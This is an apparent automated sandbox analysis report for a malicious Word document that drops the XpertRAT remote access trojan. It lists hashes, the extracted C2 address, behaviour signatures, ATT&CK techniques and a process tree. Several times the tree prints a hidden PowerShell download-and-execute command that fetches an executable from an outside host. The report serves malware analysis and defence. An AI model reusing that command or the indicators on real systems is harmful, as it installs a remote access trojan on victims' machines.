Analysis

  • max time kernel
    148s
  • max time network
    192s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    07-10-2021 11:55

General

  • Target

    RF Oferta_07102021.doc

  • Size

    500KB

  • MD5

    c977721c2b6e22a4bb29bc723e88dc14

  • SHA1

    33e5d7488767291024cbf2581fbe360384c7d67a

  • SHA256

    1c9bbe414128de9b946727e8ac7fe2edf9c28731fabbc564dee935a97721d358

  • SHA512

    93cc581978c4b35f743a6bcd7eb48efe590141be3d4f636e44b6a000332ccd4007745aa014806d3375f485a7db3ddf7630b2b24c71093eebeb890786c1603d3b

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

httP://avira.ydns.eu/EXCEL.exe

Extracted

Family

xpertrat

Version

3.0.10

Botnet

Test

C2

kapasky-antivirus.firewall-gateway.net:4000

Mutex

L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs
  • Windows security bypass 2 TTPs
  • XpertRAT

    XpertRAT is a remote access trojan with various capabilities.

  • XpertRAT Core Payload 2 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 8 IoCs
  • Windows security modification 2 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RF Oferta_07102021.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1240
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://avira.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:784
      • C:\Users\Admin\AppData\Roaming\EXCEL.exe
        "C:\Users\Admin\AppData\Roaming\EXCEL.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1496
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitter.com
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2000
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitter.com
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1852
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitter.com
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2032
        • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          4⤵
          • Executes dropped EXE
          • Windows security modification
          • Checks whether UAC is enabled
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • System policy modification
          PID:108
          • C:\Program Files (x86)\Internet Explorer\iexplore.exe
            C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2032
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://avira.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1168
      • C:\Users\Admin\AppData\Roaming\EXCEL.exe
        "C:\Users\Admin\AppData\Roaming\EXCEL.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitter.com
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1584
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitter.com
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1396
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitter.com
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1836
        • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          4⤵
          • Executes dropped EXE
          • Windows security modification
          • Checks whether UAC is enabled
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • System policy modification
          PID:1844
          • C:\Program Files (x86)\Internet Explorer\iexplore.exe
            C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
            5⤵
            • Adds policy Run key to start application
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1852
            • C:\Windows\SysWOW64\notepad.exe
              notepad.exe
              6⤵
                PID:676
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://avira.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
        2⤵
        • Process spawned unexpected child process
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1880
        • C:\Users\Admin\AppData\Roaming\EXCEL.exe
          "C:\Users\Admin\AppData\Roaming\EXCEL.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:560
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitter.com
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1160
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitter.com
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1592
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitter.com
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1888
          • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
            C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
            4⤵
            • Executes dropped EXE
            PID:520
          • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
            C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
            4⤵
            • Executes dropped EXE
            PID:1836
          • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
            C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
            4⤵
            • Executes dropped EXE
            • Windows security modification
            • Checks whether UAC is enabled
            • Suspicious use of SetWindowsHookEx
            • System policy modification
            PID:1552
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        2⤵
          PID:2036

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      Registry Run Keys / Startup Folder

      2
      T1060

      Privilege Escalation

      Bypass User Account Control

      1
      T1088

      Defense Evasion

      Bypass User Account Control

      1
      T1088

      Disabling Security Tools

      3
      T1089

      Modify Registry

      7
      T1112

      Discovery

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0d43fbce-3e47-4aa2-ab41-d43d0cd40831
        MD5

        d89968acfbd0cd60b51df04860d99896

        SHA1

        b3c29916ccb81ce98f95bbf3aa8a73de16298b29

        SHA256

        1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

        SHA512

        b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_10a2719f-ab19-452c-9537-375fecbe5f96
        MD5

        df44874327d79bd75e4264cb8dc01811

        SHA1

        1396b06debed65ea93c24998d244edebd3c0209d

        SHA256

        55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

        SHA512

        95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1abda922-9e0e-4200-89d0-60796083afcc
        MD5

        be4d72095faf84233ac17b94744f7084

        SHA1

        cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

        SHA256

        b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

        SHA512

        43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_32b21970-4839-4ac5-a2ad-cc925aecc47c
        MD5

        a725bb9fafcf91f3c6b7861a2bde6db2

        SHA1

        8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

        SHA256

        51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

        SHA512

        1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_60554f64-a36e-4439-8748-76f202d7cb75
        MD5

        02ff38ac870de39782aeee04d7b48231

        SHA1

        0390d39fa216c9b0ecdb38238304e518fb2b5095

        SHA256

        fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

        SHA512

        24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ccb18ff-7a22-469e-90e7-ccc861e1432b
        MD5

        b6d38f250ccc9003dd70efd3b778117f

        SHA1

        d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

        SHA256

        4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

        SHA512

        67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bc5ca8a-50eb-4a28-856a-31595e01418a
        MD5

        597009ea0430a463753e0f5b1d1a249e

        SHA1

        4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

        SHA256

        3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

        SHA512

        5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_939e757c-0d93-4150-a304-fc708f9168c7
        MD5

        354b8209f647a42e2ce36d8cf326cc92

        SHA1

        98c3117f797df69935f8b09fc9e95accfe3d8346

        SHA256

        feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239

        SHA512

        420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a36e357d-d10c-4050-be2b-670946538a6e
        MD5

        7f79b990cb5ed648f9e583fe35527aa7

        SHA1

        71b177b48c8bd745ef02c2affad79ca222da7c33

        SHA256

        080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

        SHA512

        20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b1e15fc1-6ba9-47a8-bc9c-ba465dc6406e
        MD5

        a70ee38af4bb2b5ed3eeb7cbd1a12fa3

        SHA1

        81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

        SHA256

        dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

        SHA512

        8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd47eb21-a96b-4ccd-99d7-0d9f3f6c10b6
        MD5

        75a8da7754349b38d64c87c938545b1b

        SHA1

        5c28c257d51f1c1587e29164cc03ea880c21b417

        SHA256

        bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

        SHA512

        798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c9b427a0-6073-4eb8-9b09-f8e4712d7ab5
        MD5

        5e3c7184a75d42dda1a83606a45001d8

        SHA1

        94ca15637721d88f30eb4b6220b805c5be0360ed

        SHA256

        8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

        SHA512

        fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        4513a62342284c0f49b2fb2bb24a6770

        SHA1

        d92a6340b717247a573e700d96bbace203a4729b

        SHA256

        a25bee305b57345e65ba2b330cb019f2aafe1831069dc2a6f81a35361ae1adf5

        SHA512

        07d5b982e1d6ceaa0be97391a20f64ad8d466538aa8de229870072cc962b30e05a5abbcc12fdd5c463893a6147892f4971344b23e81163f8eec8176fe0e2de0b

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        98e007f5683ae489d61778601684121f

        SHA1

        a84d620607d14b333ab1b744566f330ab2598ac4

        SHA256

        b52be4c16ca189354a1a289022dade1b6391bdcd9a65d212b16979a408c61062

        SHA512

        08c47abd96f09fd87c02271acd7bb7d19b1551700c0d72ecb333a8eb8c0cd39e48ac3d9b3a741dd72f6aeaeb8a0c2702343f5fd1ad0c99aacbf87227ceae05f4

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        04966767bce1ab7515bd261d935ef8f8

        SHA1

        cbd9cb1f59488051e1ecaaf590eb3eeaa3b02406

        SHA256

        485963412c3c70575dc06e98461b5f66ddf1aa22fc3d471d2bb51d2086db7db8

        SHA512

        458707ffdc06eba975d88a9eebfcf6c3df2024b694f395af90ca112f6682df720804571911411570d95c9946c69768bb944988f26a91f6c409f92adadc8cb5fc

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        04966767bce1ab7515bd261d935ef8f8

        SHA1

        cbd9cb1f59488051e1ecaaf590eb3eeaa3b02406

        SHA256

        485963412c3c70575dc06e98461b5f66ddf1aa22fc3d471d2bb51d2086db7db8

        SHA512

        458707ffdc06eba975d88a9eebfcf6c3df2024b694f395af90ca112f6682df720804571911411570d95c9946c69768bb944988f26a91f6c409f92adadc8cb5fc

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        fa7da43e5b1ad64908c7c4d1b89f7ab0

        SHA1

        e26e3ac644719389c6e42d4c5d2f45c7c15f27c3

        SHA256

        b6a030df51bab358005932f37a094ac9031324fdd625dbd252f93ab58b160a94

        SHA512

        85c70300ba1854d06b0d2c831927d717aa752acfd2b69d3c1d647f50a2a33350957fb0bbb5c2583dbd3aead476fe139d6a2b3e00f90c146d089f430afc7ead1c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        dc61a9155cefd362d0fd0cdaba2b7205

        SHA1

        e6a500b2e880307da0d9170cf5724ee34ab08d3a

        SHA256

        4980138ce901661576347be7aa06de2b2c9afadfac507ac2357cb4d6ea7c980a

        SHA512

        d4f076c658279a309902deb4d46273f21b03fba838c33806ac8a4a47fe95d2b4249d1d23db2bca4c867106a56acae4b9c8d902177fa4b9ce93b4fb204deb16df

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        df85283b488766b978c6541b4cb9318e

        SHA1

        259be12b6044e2005ba2fa31ebf6a9bef881c8f2

        SHA256

        7c30fed1f006890740d272f6631e1072ca3d36878901905bb8d388bbb499165a

        SHA512

        83f09ef926f8ea47ebd43aa034e7d630b3c104f00f6905ee27508a1c46ef6f0d43a5d099c159c187020fc645f5f505ce1edc3baa6d56bcc9a85097724c28ff39

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        36c8388a13e9995a566eda6bcf0991a9

        SHA1

        b9caf91cc3399b2de881c3a87dcd64f8840bfc6b

        SHA256

        003cbde274bac0f19555ae40b4897ff513fe574c82da35966d66e9d2563e579b

        SHA512

        558fdb7d4a158f2f4529ddd3e9ce80a05680548bb00406556233afa545418d74bc1b1081d07865b7e05ff2bf16b213826a5562e935e0910a91182fb25d4ac7e0

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        36c8388a13e9995a566eda6bcf0991a9

        SHA1

        b9caf91cc3399b2de881c3a87dcd64f8840bfc6b

        SHA256

        003cbde274bac0f19555ae40b4897ff513fe574c82da35966d66e9d2563e579b

        SHA512

        558fdb7d4a158f2f4529ddd3e9ce80a05680548bb00406556233afa545418d74bc1b1081d07865b7e05ff2bf16b213826a5562e935e0910a91182fb25d4ac7e0

      • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • C:\Users\Admin\AppData\Roaming\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • C:\Users\Admin\AppData\Roaming\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • C:\Users\Admin\AppData\Roaming\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • C:\Users\Admin\AppData\Roaming\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        1a29e7e6ec1166a8848dd45e9d7c7f50

        SHA1

        92b4ca0de260a8246876662f2cd28f89d25c22f9

        SHA256

        58b8b0f2bbbb559809a4892dd0afd15c22b8290a649e5b0b1c5d4fa2e65fcb7c

        SHA512

        d48b5ce6760c3099875e3e33edd1c0b249dafdda8f92f80ca50a98b2362d912adef172d8c32e3b1f206e7f93d66663876b50296d3640d2325872bb71b34e4620

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        1a29e7e6ec1166a8848dd45e9d7c7f50

        SHA1

        92b4ca0de260a8246876662f2cd28f89d25c22f9

        SHA256

        58b8b0f2bbbb559809a4892dd0afd15c22b8290a649e5b0b1c5d4fa2e65fcb7c

        SHA512

        d48b5ce6760c3099875e3e33edd1c0b249dafdda8f92f80ca50a98b2362d912adef172d8c32e3b1f206e7f93d66663876b50296d3640d2325872bb71b34e4620

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        1a29e7e6ec1166a8848dd45e9d7c7f50

        SHA1

        92b4ca0de260a8246876662f2cd28f89d25c22f9

        SHA256

        58b8b0f2bbbb559809a4892dd0afd15c22b8290a649e5b0b1c5d4fa2e65fcb7c

        SHA512

        d48b5ce6760c3099875e3e33edd1c0b249dafdda8f92f80ca50a98b2362d912adef172d8c32e3b1f206e7f93d66663876b50296d3640d2325872bb71b34e4620

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        1a29e7e6ec1166a8848dd45e9d7c7f50

        SHA1

        92b4ca0de260a8246876662f2cd28f89d25c22f9

        SHA256

        58b8b0f2bbbb559809a4892dd0afd15c22b8290a649e5b0b1c5d4fa2e65fcb7c

        SHA512

        d48b5ce6760c3099875e3e33edd1c0b249dafdda8f92f80ca50a98b2362d912adef172d8c32e3b1f206e7f93d66663876b50296d3640d2325872bb71b34e4620

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        1a29e7e6ec1166a8848dd45e9d7c7f50

        SHA1

        92b4ca0de260a8246876662f2cd28f89d25c22f9

        SHA256

        58b8b0f2bbbb559809a4892dd0afd15c22b8290a649e5b0b1c5d4fa2e65fcb7c

        SHA512

